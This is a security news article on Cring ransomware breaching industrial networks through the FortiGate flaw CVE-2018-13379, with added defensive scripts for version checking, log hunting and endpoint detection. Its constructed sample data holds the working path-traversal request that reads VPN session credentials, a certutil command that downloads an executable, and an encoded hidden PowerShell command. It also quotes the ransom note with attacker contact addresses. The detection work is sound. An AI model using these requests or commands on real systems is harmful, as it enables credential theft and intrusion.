Cring ransomware is exploiting a Fortinet vulnerability to breach and encrypt the networks of industrial-sector companies.
After gaining initial access, the Cring operators drop customized Mimikatz samples followed by Cobalt Strike, and fetch the ransomware payload with the legitimate Windows CertUtil certificate utility, a living-off-the-land download that helps the payload slip past security software.
Kaspersky's threat hunting team conducted detailed research and found that the attackers exploit Internet-exposed FortiGate SSL VPN servers left unpatched against CVE-2018-13379, a pre-authentication path traversal in the SSL VPN web portal that lets an attacker read system files, including the session file holding plaintext credentials of active VPN users. Those credentials give them their way into the target network.
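The following is an added example written for this article, not code from Kaspersky's report or from Fortinet. It shows the two checks a defender would run after reading the above: whether a FortiOS version falls inside the ranges Fortinet's advisory FG-IR-18-384 lists as affected by CVE-2018-13379, and whether web-portal access logs contain requests matching the vulnerability's traversal pattern. The log lines and client addresses are constructed; real FortiGate logs use a different layout, so the line regex would need adapting before use on them.

```python
"""Check FortiOS exposure to CVE-2018-13379 and hunt for probes in access logs.

Added example, not code from the article, Kaspersky or Fortinet. Affected
version ranges are those listed in Fortinet advisory FG-IR-18-384. The log
lines are constructed in a simple 'timestamp client "request" status' form;
real FortiGate logs differ, so adapt LINE_RE before running this on them.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Pre-auth path traversal: a 'lang' parameter to this endpoint that walks up
# the filesystem reads arbitrary files, classically sslvpn_websession, which
# holds plaintext credentials of active VPN sessions.
TARGET_PATH = "/remote/fgt_lang"
TRAVERSAL = re.compile(r"\.\.[\\/]")

# Inclusive affected ranges per FG-IR-18-384; 6.2.0 and later are not affected.
AFFECTED = [((5, 4, 6), (5, 4, 12)), ((5, 6, 3), (5, 6, 7)), ((6, 0, 0), (6, 0, 4))]

# Constructed sample log (not real traffic); RFC 5737 documentation addresses.
SAMPLE_LOG = """\
2021-01-12T03:15:01Z 192.0.2.10 "GET /remote/login?lang=en HTTP/1.1" 200
2021-01-12T03:15:02Z 203.0.113.7 "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpnwebsession HTTP/1.1" 200
2021-01-12T03:15:03Z 192.0.2.10 "GET /remote/fgt_lang?lang=en HTTP/1.1" 200
2021-01-12T03:16:44Z 198.51.100.9 "GET /remote/fgt_lang?lang=%2f..%2f..%2f..%2f..%2fdev%2fcmdb%2fsslvpnwebsession HTTP/1.1" 200
"""
LINE_RE = re.compile(r'^(\S+) (\S+) "(\S+) (\S+) [^"]*" (\d{3})')


def parse_version(version):
    """'6.0.4' -> (6, 0, 4) so versions compare as tuples, not strings."""
    return tuple(int(part) for part in version.split("."))


def is_vulnerable(version):
    """True when a FortiOS version lies inside one of the affected ranges."""
    ver = parse_version(version)
    return any(low <= ver <= high for low, high in AFFECTED)


def is_traversal_probe(url):
    """True for a request to the fgt_lang endpoint whose lang= walks the filesystem."""
    parts = urlsplit(url)
    if parts.path != TARGET_PATH:
        return False
    # parse_qs decodes once; unquote again to catch double-encoded '%252e%252e'.
    for value in parse_qs(parts.query).get("lang", []):
        if TRAVERSAL.search(unquote(value)):
            return True
    return False


def scan(log_text):
    """Return (client, decoded URL) for each log line matching the probe pattern."""
    hits = []
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue  # unparseable line: skip rather than guess
        _ts, client, _method, url, _status = match.groups()
        if is_traversal_probe(url):
            hits.append((client, unquote(url)))
    return hits


if __name__ == "__main__":
    for client, url in scan(SAMPLE_LOG):
        print(f"CVE-2018-13379 probe from {client}: {url}")
    print("FortiOS 6.0.4 exposed:", is_vulnerable("6.0.4"))
```

A hit in the log is evidence of probing, not proof of compromise; the response status and size would tell you whether the session file was actually served, and on an affected version you should assume every VPN credential that was active at the time is burned and reset it, independent of patching.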
“Victims of these attacks include industrial enterprises in European countries,” Kaspersky researchers said.
“At least in one case, an attack of the ransomware resulted in a temporary shutdown of the industrial process due to servers used to control the industrial process becoming encrypted.”
Attack Scenario
Once inside, Cring operators move laterally across the enterprise network, using Mimikatz to steal Windows user credentials until they gain control of a domain administrator account.
Cobalt Strike, deployed with a malicious PowerShell script, is then used to push the ransomware payload to devices across the victim's network.
The ransomware first kills Microsoft Office and Oracle Database processes, so that files those applications hold open can be encrypted, and removes backup files; it then encrypts only specific file types on the compromised devices using a hybrid scheme, with file contents encrypted by AES-128 and the AES key protected by an RSA-8192 public key.
It then drops ransom notes named !!!!!readme.rtf and deReadMe!!!.txt, warning victims that their network has been encrypted and urging them to pay quickly because the decryption key will not be kept indefinitely.
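Turning the attack scenario above into detection terms, here is an added example (not from the article or Kaspersky's report) that runs three rules over constructed Sysmon-style endpoint events: a CertUtil download from a URL, a PowerShell download cradle (an assumption, since the article only says a malicious PowerShell script deployed Cobalt Strike), and creation of the two ransom note filenames. Host names, file paths and the download URL are made up. A host is flagged only when two or more distinct stages are seen on it, which keeps a single legitimate certutil invocation from paging anyone.

```python
"""Detect the Cring post-exploitation chain in endpoint telemetry.

Added example, not code from the article or from Kaspersky's report. The
events are constructed Sysmon-style records (EventID 1 = process create,
EventID 11 = file create) with Sysmon field names; hosts, paths and the
download URL are made up. The PowerShell rule is an assumption: the article
only says Cobalt Strike was deployed with a malicious PowerShell script.
"""
from collections import defaultdict

# Ransom note names reported for Cring, compared case-insensitively.
RANSOM_NOTES = {"!!!!!readme.rtf", "dereadme!!!.txt"}


def certutil_download(ev):
    """certutil used as a downloader: -urlcache together with a URL on the command line."""
    cl = ev["CommandLine"].lower()
    return ev["Image"].lower().endswith("certutil.exe") and "urlcache" in cl and "http" in cl


def powershell_cradle(ev):
    """Assumed loader shape: encoded PowerShell or an in-memory download-and-execute."""
    cl = ev["CommandLine"].lower()
    return ev["Image"].lower().endswith("powershell.exe") and any(
        marker in cl for marker in ("-enc", "-encodedcommand", "downloadstring", "iex ")
    )


def ransom_note_drop(ev):
    """Creation of a file whose name matches a known Cring ransom note."""
    return ev["TargetFilename"].rsplit("\\", 1)[-1].lower() in RANSOM_NOTES


# (rule name, Sysmon EventID the rule applies to, predicate over the event)
RULES = [
    ("certutil_download", 1, certutil_download),
    ("powershell_cradle", 1, powershell_cradle),
    ("ransom_note_drop", 11, ransom_note_drop),
]

# Constructed telemetry: one host showing the full chain, one with benign activity.
EVENTS = [
    {"EventID": 1, "Computer": "SRV-HMI01",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://198.51.100.20/up.dat C:\Windows\Temp\up.exe"},
    {"EventID": 1, "Computer": "SRV-HMI01",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"EventID": 11, "Computer": "SRV-HMI01",
     "TargetFilename": r"C:\Users\Public\!!!!!readme.rtf"},
    {"EventID": 11, "Computer": "SRV-HMI01",
     "TargetFilename": r"D:\oracle\data\deReadMe!!!.txt"},
    {"EventID": 1, "Computer": "WS-ENG07",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -verify C:\certs\vpn.cer"},
    {"EventID": 11, "Computer": "WS-ENG07",
     "TargetFilename": r"C:\Users\alice\Documents\readme.txt"},
]


def evaluate(events):
    """Return {host: sorted list of rule names that fired on that host}."""
    hits = defaultdict(set)
    for ev in events:
        for name, event_id, pred in RULES:
            # Gate on EventID first: file-create records carry no CommandLine field.
            if ev["EventID"] == event_id and pred(ev):
                hits[ev["Computer"]].add(name)
    return {host: sorted(names) for host, names in hits.items()}


def flagged_hosts(events, min_rules=2):
    """Hosts on which at least min_rules distinct stages of the chain were seen."""
    return sorted(host for host, names in evaluate(events).items() if len(names) >= min_rules)


if __name__ == "__main__":
    for host, names in evaluate(EVENTS).items():
        print(host, "->", ", ".join(names))
    print("flagged:", flagged_hosts(EVENTS))
```

The ransom-note rule fires last in the chain and is essentially a confirmation of encryption already under way; the value of this kind of correlation is in the first two rules, which fire while the payload is still being staged.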
Ransom Note
Sorry, your network is encrypted, and most files are encrypted using special technology. The file cannot be recovered by any security company. If you do not believe that you can even consult a security company, your answer will be that you need to pay the corresponding fees, but we have a good reputation. After receiving the corresponding fee, we will immediately send the decryption program and KEY. You can contact us to get two file decryption services, and then you will get all decryption services after paying our fee, usually the cost is about 2 bitcoins.
Contact: eternalnightmare@tutanota.com qkhooks0708@protonmail.com
Victims have been submitting samples to the ID-Ransomware service to check whether their systems were hit by Cring since the operation first surfaced in December 2020.
Indicators of compromise (IOCs), including malware sample hashes, C2 server IP addresses, and malware-hosting server addresses, are available at the end of Kaspersky’s report.